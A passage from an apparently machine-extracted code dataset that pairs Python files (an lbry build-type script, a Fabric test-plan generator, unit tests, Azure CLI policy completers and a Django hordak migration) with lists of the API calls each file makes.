'https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books'), (\n 'with_custom_extension_and_title_and_data_source_and_region', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books', 'us-east-3'), (\n 'with_protected_access_and_custom_extension_and_title_and_data_source_and_region'\n , {S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY: 'thebooks'},\n 'ABOOK',\n 'https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books', 'us-east-3', False)]"], {}), "([('with_identifier', {S3UploaderConfiguration.\n OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.epub'), (\n 'with_custom_extension', {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY:\n 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf', 'pdf'), (\n 'with_custom_dotted_extension', {S3UploaderConfiguration.\n OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf', '.pdf'),\n ('with_custom_data_source', {S3UploaderConfiguration.\n OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK.epub',\n None, DataSource.UNGLUE_IT), ('with_custom_title', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 
'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK/On%20Books.epub',\n None, None, 'On Books'), (\n 'with_custom_extension_and_title_and_data_source', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books'), (\n 'with_custom_extension_and_title_and_data_source_and_region', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books', 'us-east-3'), (\n 'with_protected_access_and_custom_extension_and_title_and_data_source_and_region'\n , {S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY: 'thebooks'},\n 'ABOOK',\n 'https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books', 'us-east-3', False)])\n", (21388, 23249), False, 'from parameterized import parameterized\n'), ((25064, 26113), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('without_scaled_size', {S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY:\n 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK', 'filename',\n 'https://thecovers.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename'\n ), ('without_scaled_size_and_with_custom_region', {\n S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: 'thecovers'},\n DataSource.UNGLUE_IT, 'ABOOK', 'filename',\n 'https://thecovers.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , None, 'us-east-3'), ('with_scaled_size', {S3UploaderConfiguration.\n BOOK_COVERS_BUCKET_KEY: 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK',\n 'filename',\n 'https://thecovers.s3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , 601), ('with_scaled_size_and_custom_region', {S3UploaderConfiguration\n .BOOK_COVERS_BUCKET_KEY: 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK',\n 'filename',\n 'https://thecovers.s3.us-east-3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , 601, 'us-east-3')]"], {}), "([('without_scaled_size', {S3UploaderConfiguration.\n BOOK_COVERS_BUCKET_KEY: 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK',\n 'filename',\n 'https://thecovers.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename'\n ), ('without_scaled_size_and_with_custom_region', {\n S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: 'thecovers'},\n DataSource.UNGLUE_IT, 'ABOOK', 'filename',\n 'https://thecovers.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , None, 'us-east-3'), ('with_scaled_size', {S3UploaderConfiguration.\n BOOK_COVERS_BUCKET_KEY: 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK',\n 'filename',\n 'https://thecovers.s3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , 601), ('with_scaled_size_and_custom_region', {S3UploaderConfiguration\n .BOOK_COVERS_BUCKET_KEY: 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK',\n 'filename',\n 'https://thecovers.s3.us-east-3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , 601, 'us-east-3')])\n", (25084, 26113), False, 'from parameterized import parameterized\n'), ((30432, 31933), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('s3_path_style_request_without_region',\n 'https://s3.amazonaws.com/bucket/directory/filename.jpg', ('bucket',\n 'directory/filename.jpg')), ('s3_path_style_request_with_region',\n 
'https://s3.us-east-2.amazonaws.com/bucket/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_global_endpoint',\n 'https://bucket.s3.amazonaws.com/directory/filename.jpg', ('bucket',\n 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_dashed_region',\n 'https://bucket.s3-us-east-2.amazonaws.com/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_dotted_region',\n 'https://bucket.s3.us-east-2.amazonaws.com/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), ('http_url',\n 'http://book-covers.nypl.org/directory/filename.jpg', (\n 'book-covers.nypl.org', 'directory/filename.jpg')), ('https_url',\n 'https://book-covers.nypl.org/directory/filename.jpg', (\n 'book-covers.nypl.org', 'directory/filename.jpg')), (\n 'http_url_with_escaped_symbols',\n 'http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg', (\n 'book-covers.nypl.org', 'directory/filename with spaces!.jpg')), (\n 'http_url_with_escaped_symbols_but_unquote_set_to_false',\n 'http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg', (\n 'book-covers.nypl.org', 'directory/filename+with+spaces%21.jpg'), False)]"], {}), "([('s3_path_style_request_without_region',\n 'https://s3.amazonaws.com/bucket/directory/filename.jpg', ('bucket',\n 'directory/filename.jpg')), ('s3_path_style_request_with_region',\n 'https://s3.us-east-2.amazonaws.com/bucket/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_global_endpoint',\n 'https://bucket.s3.amazonaws.com/directory/filename.jpg', ('bucket',\n 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_dashed_region',\n 'https://bucket.s3-us-east-2.amazonaws.com/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_dotted_region',\n 'https://bucket.s3.us-east-2.amazonaws.com/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), ('http_url',\n 'http://book-covers.nypl.org/directory/filename.jpg', (\n 'book-covers.nypl.org', 'directory/filename.jpg')), ('https_url',\n 'https://book-covers.nypl.org/directory/filename.jpg', (\n 'book-covers.nypl.org', 'directory/filename.jpg')), (\n 'http_url_with_escaped_symbols',\n 'http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg', (\n 'book-covers.nypl.org', 'directory/filename with spaces!.jpg')), (\n 'http_url_with_escaped_symbols_but_unquote_set_to_false',\n 'http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg', (\n 'book-covers.nypl.org', 'directory/filename+with+spaces%21.jpg'), False)])\n", (30452, 31933), False, 'from parameterized import parameterized\n'), ((3943, 4203), 'boto3.client', 'boto3.client', (['"""s3"""'], {'aws_access_key_id': 'TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_USER', 'aws_secret_access_key': 'TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_PASSWORD', 'endpoint_url': 'TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL'}), "('s3', aws_access_key_id=TestS3UploaderIntegration.\n SIMPLIFIED_TEST_MINIO_USER, aws_secret_access_key=\n TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_PASSWORD, endpoint_url=\n TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL)\n", (3955, 4203), False, 'import boto3\n'), ((4278, 4389), 'functools.partial', 'functools.partial', (['boto3.client'], {'endpoint_url': 'TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL'}), '(boto3.client, 
endpoint_url=TestS3UploaderIntegration.\n SIMPLIFIED_TEST_MINIO_ENDPOINT_URL)\n', (4295, 4389), False, 'import functools\n'), ((8253, 8264), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8262, 8264), False, 'from mock import MagicMock\n'), ((36178, 36193), 'botocore.exceptions.BotoCoreError', 'BotoCoreError', ([], {}), '()\n', (36191, 36193), False, 'from botocore.exceptions import BotoCoreError, ClientError\n'), ((36583, 36621), 'botocore.exceptions.ClientError', 'ClientError', (['response', '"""SomeOperation"""'], {}), "(response, 'SomeOperation')\n", (36594, 36621), False, 'from botocore.exceptions import BotoCoreError, ClientError\n'), ((37127, 37193), 'pytest.raises', 'pytest.raises', (['Exception', 'uploader.mirror_one', 'epub_rep', 'self._url'], {}), '(Exception, uploader.mirror_one, epub_rep, self._url)\n', (37140, 37193), False, 'import pytest\n'), ((41562, 41604), 'mock.MagicMock', 'MagicMock', ([], {'return_value': '(bucket, filename)'}), '(return_value=(bucket, filename))\n', (41571, 41604), False, 'from mock import MagicMock\n'), ((41657, 41693), 'mock.MagicMock', 'MagicMock', ([], {'return_value': 'expected_url'}), '(return_value=expected_url)\n', (41666, 41693), False, 'from mock import MagicMock\n'), ((42904, 42971), 'pytest.raises', 'pytest.raises', (['Exception', 'MultipartS3Upload', 'uploader', 'rep', 'rep.url'], {}), '(Exception, MultipartS3Upload, uploader, rep, rep.url)\n', (42917, 42971), False, 'import pytest\n'), ((43924, 43978), 'pytest.raises', 'pytest.raises', (['Exception', 'upload.upload_part', '"""Part 3"""'], {}), "(Exception, upload.upload_part, 'Part 3')\n", (43937, 43978), False, 'import pytest\n'), ((45205, 45298), 'functools.partial', 'functools.partial', (['S3Uploader'], {'host': 'S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST'}), '(S3Uploader, host=S3UploaderIntegrationTest.\n SIMPLIFIED_TEST_MINIO_HOST)\n', (45222, 45298), False, 'import functools\n'), ((45580, 45673), 'functools.partial', 'functools.partial', (['S3Uploader'], {'host': 'S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST'}), '(S3Uploader, host=S3UploaderIntegrationTest.\n SIMPLIFIED_TEST_MINIO_HOST)\n', (45597, 45673), False, 'import functools\n')]
vanshdevgan/lbry-sdk
lbry/scripts/set_build.py
3624a3b450945235edcf76971e18c898fba67455
"""Set the build version to be 'qa', 'rc', 'release'""" import sys import os import re import logging log = logging.getLogger() log.addHandler(logging.StreamHandler()) log.setLevel(logging.DEBUG) def get_build_type(travis_tag=None): if not travis_tag: return "qa" log.debug("getting build type for tag: \"%s\"", travis_tag) if re.match(r'v\d+\.\d+\.\d+rc\d+$', travis_tag): return 'rc' elif re.match(r'v\d+\.\d+\.\d+$', travis_tag): return 'release' return 'qa' def main(): root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) build_type_path = os.path.join(root_dir, 'lbry', 'build_type.py') log.debug("configuring build type file: %s", build_type_path) travis_commit = os.environ['TRAVIS_COMMIT'][:6] build_type = get_build_type(os.environ.get('TRAVIS_TAG', None)) log.debug("setting build type=%s, build commit=%s", build_type, travis_commit) with open(build_type_path, 'w') as f: f.write(f"BUILD = \"{build_type}\"\nBUILD_COMMIT = \"{travis_commit}\"\n") if __name__ == '__main__': sys.exit(main())
[((110, 129), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (127, 129), False, 'import logging\n'), ((145, 168), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (166, 168), False, 'import logging\n'), ((351, 401), 're.match', 're.match', (['"""v\\\\d+\\\\.\\\\d+\\\\.\\\\d+rc\\\\d+$"""', 'travis_tag'], {}), "('v\\\\d+\\\\.\\\\d+\\\\.\\\\d+rc\\\\d+$', travis_tag)\n", (359, 401), False, 'import re\n'), ((622, 669), 'os.path.join', 'os.path.join', (['root_dir', '"""lbry"""', '"""build_type.py"""'], {}), "(root_dir, 'lbry', 'build_type.py')\n", (634, 669), False, 'import os\n'), ((427, 471), 're.match', 're.match', (['"""v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$"""', 'travis_tag'], {}), "('v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$', travis_tag)\n", (435, 471), False, 'import re\n'), ((820, 854), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_TAG"""', 'None'], {}), "('TRAVIS_TAG', None)\n", (834, 854), False, 'import os\n'), ((571, 597), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (587, 597), False, 'import os\n')]
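For reference, a minimal sketch (the sample tags below are hypothetical, not from the repository) showing how the tag-matching regexes in get_build_type above classify Travis tags:

# Illustrative sketch; regexes mirror get_build_type above, sample tags are made up.
import re

def classify(tag):
    if not tag:
        return 'qa'
    if re.match(r'v\d+\.\d+\.\d+rc\d+$', tag):
        return 'rc'
    if re.match(r'v\d+\.\d+\.\d+$', tag):
        return 'release'
    return 'qa'

assert classify(None) == 'qa'             # no tag -> qa build
assert classify('v0.83.0rc1') == 'rc'     # release-candidate tag
assert classify('v0.83.0') == 'release'   # final release tag
assert classify('v0.83.0-beta') == 'qa'   # anything else falls back to qa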
gbl1124/hfrd
backend/jenkins/pipelines/ansible/utils/testplan_gen.py
327d7c1e18704d2e31a2649b40ae1d90353ebe24
#!/usr/bin/python
import yaml
import os
import ast
import sys
from collections import OrderedDict

curr_dir = os.getcwd()
work_dir = sys.argv[1]
network_type = sys.argv[2]

testplan_dict = {}
testplan_dict["name"] = "System performance test"
testplan_dict["description"] = "This test is to create as much chaincode computation load as possible"
testplan_dict["runid"] = "RUNID_HERE"
if network_type == "ibp":
    testplan_dict["networkid"] = sys.argv[3]
testplan_dict["collectFabricMetrics"] = False
testplan_dict["storageclass"] = "default"
testplan_dict["saveLog"] = False
testplan_dict["continueAfterFail"] = True
testplan_dict["tests"] = []
testplan_dict["peernodeAlias"] = []

if os.path.exists(work_dir) != True:
    print 'certs keyfiles directory do not exist'
    exit(1)

# Load template file
with open(curr_dir + "/templates/testplan_template.yml", 'r') as stream:
    template = yaml.load(stream)

channel_create = template["CHANNEL_CREATE"]
# channel_join = template["CHANNEL_JOIN"]
chaincode_install = template["CHAINCODE_INSTALL"]
chaincode_instantiate = template["CHAINCODE_INSTANTIATE"]
chaincode_invoke = template["CHAINCODE_INVOKE"]
execute_command = template["EXECUTE_COMMAND"]

connectionProfile = {}
org_list = []
org_list_lowercase = []
orderer_list = []
peer_list = []
org_peers_dict = {}
org_anchor_dict = {}
allAnchor_list = []

# Load connection profile
for orgName in os.listdir(work_dir + '/keyfiles'):
    if os.path.isfile(work_dir + '/keyfiles/' + orgName + '/connection.yml'):
        with open(work_dir + '/keyfiles/' + orgName + '/connection.yml', 'r') as stream:
            connectionProfile = yaml.load(stream)
        if connectionProfile["orderers"] is None:
            continue
        orderer_list = orderer_list + connectionProfile["orderers"].keys()
        if (connectionProfile["organizations"][orgName.lower()]["peers"] != None):
            org_list.append(orgName)
            org_list_lowercase.append(orgName.lower())
            org_peers_dict[orgName] = connectionProfile["organizations"][orgName.lower()]["peers"]
            peer_list = peer_list + \
                connectionProfile["organizations"][orgName.lower()]["peers"]
            org_anchor_dict[orgName] = sorted(
                connectionProfile["organizations"][orgName.lower()]["peers"])[0]

# When there is only peer or orderer, we skip tests.
if len(orderer_list) == 0 or len(peer_list) == 0:
    outputfile = open(work_dir + '/testplan_example.yml', 'w')
    outputfile.write("")
    outputfile.close()
    exit(0)

orderer_list = list(OrderedDict.fromkeys(orderer_list))
peer_list = list(OrderedDict.fromkeys(peer_list))

for orgName in org_list:
    tempOrgAnchorObj = {}
    tempOrgAnchorObj[orgName + "Anchor"] = org_anchor_dict[orgName]
    testplan_dict["peernodeAlias"].append(tempOrgAnchorObj)
    tempOrgPeersObj = {}
    tempOrgPeersObj[orgName + "Peers"] = ','.join(org_peers_dict[orgName])
    testplan_dict["peernodeAlias"].append(tempOrgPeersObj)
    allAnchor_list.append(org_anchor_dict[orgName])

testplan_dict["peernodeAlias"].append({"allAnchors": ','.join(allAnchor_list)})
testplan_dict["peernodeAlias"].append({"allPeers": ','.join(peer_list)})

print 'org list: '
print org_list_lowercase
print 'orderer_list: '
print orderer_list
print 'peer_list: '
print peer_list
print 'allAnchor_list'
print allAnchor_list

# CREATE_CHANNEL
channel_create["parameters"]["connectionProfile"] = org_list[0]
if network_type == 'cello':
    channel_create["parameters"]["channelConsortium"] = 'FabricConsortium'
else:
    channel_create["parameters"]["channelConsortium"] = 'SampleConsortium'
channel_create["parameters"]["channelOrgs"] = ','.join(org_list_lowercase)
channel_create["parameters"]["ordererName"] = orderer_list[0]
testplan_dict["tests"].append(channel_create)

# JOIN_CHANNEL and INSTALL_CHAINCODE
join_list = []
install_list = []
for org in org_list:
    channel_join = template["CHANNEL_JOIN"]
    channel_join["parameters"]["connectionProfile"] = org
    channel_join["parameters"]["peers"] = ','.join(org_peers_dict[org])
    channel_join["parameters"]["ordererName"] = orderer_list[0]
    join_list.append(str(channel_join))
    # CHAINCODE_INSTALL
    chaincode_install["parameters"]["connectionProfile"] = org
    chaincode_install["parameters"]["peers"] = ','.join(org_peers_dict[org])
    install_list.append(str(chaincode_install))

for join_org in join_list:
    join_item = ast.literal_eval(join_org)
    testplan_dict["tests"].append(join_item)

for install_org in install_list:
    install_item = ast.literal_eval(install_org)
    testplan_dict["tests"].append(install_item)

# CHAINCODE_INSTANTIATE
chaincode_instantiate["parameters"]["connectionProfile"] = org_list[0]
chaincode_instantiate["parameters"]["peers"] = ','.join(peer_list)

# CHAINCODE_INVOKE
# Invoke with fixed transaction count : 100
chaincode_invoke["iterationCount"] = '100'
chaincode_invoke["parameters"]["connectionProfile"] = org_list[0]
chaincode_invoke["parameters"]["peers"] = ','.join(peer_list)
chaincoode_invoke_count = str(chaincode_invoke)

# Invoke with fixed running duration : 0 hour 10 minutes 0 second.
# And enable running tests parallel by setting waitUntilFinish to true
chaincode_invoke["iterationCount"] = '0h10m0s'
chaincode_invoke["waitUntilFinish"] = False
chaincoode_invoke_time = str(chaincode_invoke)

# Invoke with fixed running duration : 0 hour 10 minutes 0 second
chaincode_invoke["iterationCount"] = '0h10m0s'
chaincode_invoke["parameters"]["peers"] = peer_list[0]
chaincoode_invoke_parallel = str(chaincode_invoke)

testplan_dict["tests"].append(chaincode_instantiate)
testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_count))
testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_time))
testplan_dict["tests"].append(ast.literal_eval(chaincoode_invoke_parallel))

# Execute command with default images
testplan_dict["tests"].append(ast.literal_eval(str(execute_command)))
# Execute command with customized image
execute_command["name"] = "execute-command-with-customized-image"
execute_command["container"] = "user/ownimage"
testplan_dict["tests"].append(ast.literal_eval(str(execute_command)))

connYamlStr = yaml.dump(testplan_dict, default_flow_style=False)
tempstr = connYamlStr
for orgName in org_list:
    tempstr = tempstr.replace(orgName + "Anchor:", orgName + "Anchor: &" + orgName + "Anchor")
    tempstr = tempstr.replace(orgName + "Peers:", orgName + "Peers: &" + orgName + "Peers")
tempstr = tempstr.replace("allAnchors:", "allAnchors: &allAnchors")
tempstr = tempstr.replace("allPeers:", "allPeers: &allPeers")
tempstr = tempstr.replace("runid:", "runid: &runid")
if network_type == "ibp":
    tempstr = tempstr.replace("networkid:", "networkid: &networkid")

# Dump testplan file
outputfile = open(work_dir + '/testplan_example.yml', 'w')
outputfile.write(tempstr)
outputfile.close()
[]
cyber-fighters/dblib
dblib/test_lib.py
9743122a55bc265f7551dd9283f381678b2703e4
"""Collection of tests.""" import pytest import dblib.lib f0 = dblib.lib.Finding('CD spook', 'my_PC', 'The CD drive is missing.') f1 = dblib.lib.Finding('Unplugged', 'my_PC', 'The power cord is unplugged.') f2 = dblib.lib.Finding('Monitor switched off', 'my_PC', 'The monitor is switched off.') def test_add_remove(): """Test function.""" db = dblib.lib.BackyardDB() # regular cases db.add(f0) assert f0 in db.findings assert len(db.findings) == 1 db.add(f1) assert f1 in db.findings assert len(db.findings) == 2 db.add(f2) assert f2 in db.findings assert len(db.findings) == 3 db.add(None) assert len(db.findings) == 3 db.remove(f1) assert f1 not in db.findings assert len(db.findings) == 2 # test exceptions with pytest.raises(TypeError): db.add(1) def test_update(): """Test function.""" db = dblib.lib.BackyardDB() db.add(f0) db.add(f1) db.update(f1, f2) assert f2 in db.findings assert len(db.findings) == 2
[((797, 821), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (810, 821), False, 'import pytest\n')]
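dblib.lib itself is not part of this row, so the interface these tests exercise can only be inferred. A minimal hypothetical sketch of Finding and BackyardDB that would satisfy the assertions above; the class layout and field names are assumptions, not the real package:

# Hypothetical reconstruction of the dblib.lib interface used by test_lib.py.
class Finding:
    def __init__(self, title, host, description):
        # Field names are assumed; the tests only pass three strings.
        self.title = title
        self.host = host
        self.description = description


class BackyardDB:
    def __init__(self):
        self.findings = []

    def add(self, finding):
        if finding is None:
            return  # the tests expect None to be silently ignored
        if not isinstance(finding, Finding):
            raise TypeError("finding must be a Finding instance")
        self.findings.append(finding)

    def remove(self, finding):
        self.findings.remove(finding)

    def update(self, old, new):
        self.findings[self.findings.index(old)] = new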
YuanyuanNi/azure-cli
src/azure-cli/azure/cli/command_modules/policyinsights/_completers.py
63844964374858bfacd209bfe1b69eb456bd64ca
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------

from azure.cli.core.decorators import Completer
from azure.cli.core.commands.client_factory import get_subscription_id

from ._client_factory import cf_policy_insights


@Completer
def get_policy_remediation_completion_list(cmd, prefix, namespace, **kwargs):  # pylint: disable=unused-argument
    client = cf_policy_insights(cmd.cli_ctx)
    sub = get_subscription_id(cmd.cli_ctx)
    rg = getattr(namespace, 'resource_group_name', None)
    management_group = getattr(namespace, 'management_group_name', None)
    if rg:
        result = client.remediations.list_for_resource_group(subscription_id=sub, resource_group_name=rg)
    elif management_group:
        result = client.remediations.list_for_management_group(management_group_id=management_group)
    else:
        result = client.remediations.list_for_subscription(subscription_id=sub)
    return [i.name for i in result]


@Completer
def get_policy_metadata_completion_list(cmd, prefix, namespace, **kwargs):  # pylint: disable=unused-argument
    client = cf_policy_insights(cmd.cli_ctx).policy_metadata
    from azure.mgmt.policyinsights.models import QueryOptions
    query_options = QueryOptions(top=2000)
    return [metadata.name for metadata in client.list(query_options) if metadata.name.startswith(prefix)]
[((695, 727), 'azure.cli.core.commands.client_factory.get_subscription_id', 'get_subscription_id', (['cmd.cli_ctx'], {}), '(cmd.cli_ctx)\n', (714, 727), False, 'from azure.cli.core.commands.client_factory import get_subscription_id\n'), ((1497, 1519), 'azure.mgmt.policyinsights.models.QueryOptions', 'QueryOptions', ([], {'top': '(2000)'}), '(top=2000)\n', (1509, 1519), False, 'from azure.mgmt.policyinsights.models import QueryOptions\n')]
CodeBrew-LTD/django-hordak
hordak/migrations/0011_auto_20170225_2222.py
efdfe503bf38b0a283790c5b4d27bd6bb28155e4
# -*- coding: utf-8 -*- # Generated by Django 1.10.4 on 2017-02-25 22:22 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import django_smalluuid.models class Migration(migrations.Migration): dependencies = [("hordak", "0010_auto_20161216_1202")] operations = [ migrations.CreateModel( name="TransactionImport", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID" ), ), ( "uuid", django_smalluuid.models.SmallUUIDField( default=django_smalluuid.models.UUIDDefault(), editable=False, unique=True ), ), ( "timestamp", models.DateTimeField(default=django.utils.timezone.now, editable=False), ), ( "has_headings", models.BooleanField( default=True, verbose_name="First line of file contains headings" ), ), ( "file", models.FileField( upload_to="transaction_imports", verbose_name="CSV file to import" ), ), ( "state", models.CharField( choices=[ ("pending", "Pending"), ("uploaded", "Uploaded, ready to import"), ("done", "Import complete"), ], default="pending", max_length=20, ), ), ( "date_format", models.CharField( choices=[ ("%d-%m-%Y", "dd-mm-yyyy"), ("%d/%m/%Y", "dd/mm/yyyy"), ("%d.%m.%Y", "dd.mm.yyyy"), ("%d-%Y-%m", "dd-yyyy-mm"), ("%d/%Y/%m", "dd/yyyy/mm"), ("%d.%Y.%m", "dd.yyyy.mm"), ("%m-%d-%Y", "mm-dd-yyyy"), ("%m/%d/%Y", "mm/dd/yyyy"), ("%m.%d.%Y", "mm.dd.yyyy"), ("%m-%Y-%d", "mm-yyyy-dd"), ("%m/%Y/%d", "mm/yyyy/dd"), ("%m.%Y.%d", "mm.yyyy.dd"), ("%Y-%d-%m", "yyyy-dd-mm"), ("%Y/%d/%m", "yyyy/dd/mm"), ("%Y.%d.%m", "yyyy.dd.mm"), ("%Y-%m-%d", "yyyy-mm-dd"), ("%Y/%m/%d", "yyyy/mm/dd"), ("%Y.%m.%d", "yyyy.mm.dd"), ("%d-%m-%y", "dd-mm-yy"), ("%d/%m/%y", "dd/mm/yy"), ("%d.%m.%y", "dd.mm.yy"), ("%d-%y-%m", "dd-yy-mm"), ("%d/%y/%m", "dd/yy/mm"), ("%d.%y.%m", "dd.yy.mm"), ("%m-%d-%y", "mm-dd-yy"), ("%m/%d/%y", "mm/dd/yy"), ("%m.%d.%y", "mm.dd.yy"), ("%m-%y-%d", "mm-yy-dd"), ("%m/%y/%d", "mm/yy/dd"), ("%m.%y.%d", "mm.yy.dd"), ("%y-%d-%m", "yy-dd-mm"), ("%y/%d/%m", "yy/dd/mm"), ("%y.%d.%m", "yy.dd.mm"), ("%y-%m-%d", "yy-mm-dd"), ("%y/%m/%d", "yy/mm/dd"), ("%y.%m.%d", "yy.mm.dd"), ], default="%d-%m-%Y", max_length=50, ), ), ( "hordak_import", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="hordak.StatementImport" ), ), ], ), migrations.CreateModel( name="TransactionImportColumn", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID" ), ), ("column_number", models.PositiveSmallIntegerField()), ( "column_heading", models.CharField(blank=True, default="", max_length=100, verbose_name="Column"), ), ( "to_field", models.CharField( blank=True, choices=[ (None, "-- Do not import --"), ("date", "Date"), ("amount", "Amount"), ("amount_out", "Amount (money in only)"), ("amount_in", "Amount (money out only)"), ("description", "Description / Notes"), ], default=None, max_length=20, null=True, verbose_name="Is", ), ), ("example", models.CharField(blank=True, default="", max_length=200)), ( "transaction_import", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="columns", to="hordak.TransactionImport", ), ), ], options={"ordering": ["transaction_import", "column_number"]}, ), migrations.AlterUniqueTogether( name="transactionimportcolumn", unique_together=set( [("transaction_import", "column_number"), ("transaction_import", "to_field")] ), ), ]
[((524, 617), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (540, 617), False, 'from django.db import migrations, models\n'), ((998, 1069), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now', 'editable': '(False)'}), '(default=django.utils.timezone.now, editable=False)\n', (1018, 1069), False, 'from django.db import migrations, models\n'), ((1164, 1255), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""First line of file contains headings"""'}), "(default=True, verbose_name=\n 'First line of file contains headings')\n", (1183, 1255), False, 'from django.db import migrations, models\n'), ((1383, 1472), 'django.db.models.FileField', 'models.FileField', ([], {'upload_to': '"""transaction_imports"""', 'verbose_name': '"""CSV file to import"""'}), "(upload_to='transaction_imports', verbose_name=\n 'CSV file to import')\n", (1399, 1472), False, 'from django.db import migrations, models\n'), ((1601, 1766), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('pending', 'Pending'), ('uploaded', 'Uploaded, ready to import'), ('done',\n 'Import complete')]", 'default': '"""pending"""', 'max_length': '(20)'}), "(choices=[('pending', 'Pending'), ('uploaded',\n 'Uploaded, ready to import'), ('done', 'Import complete')], 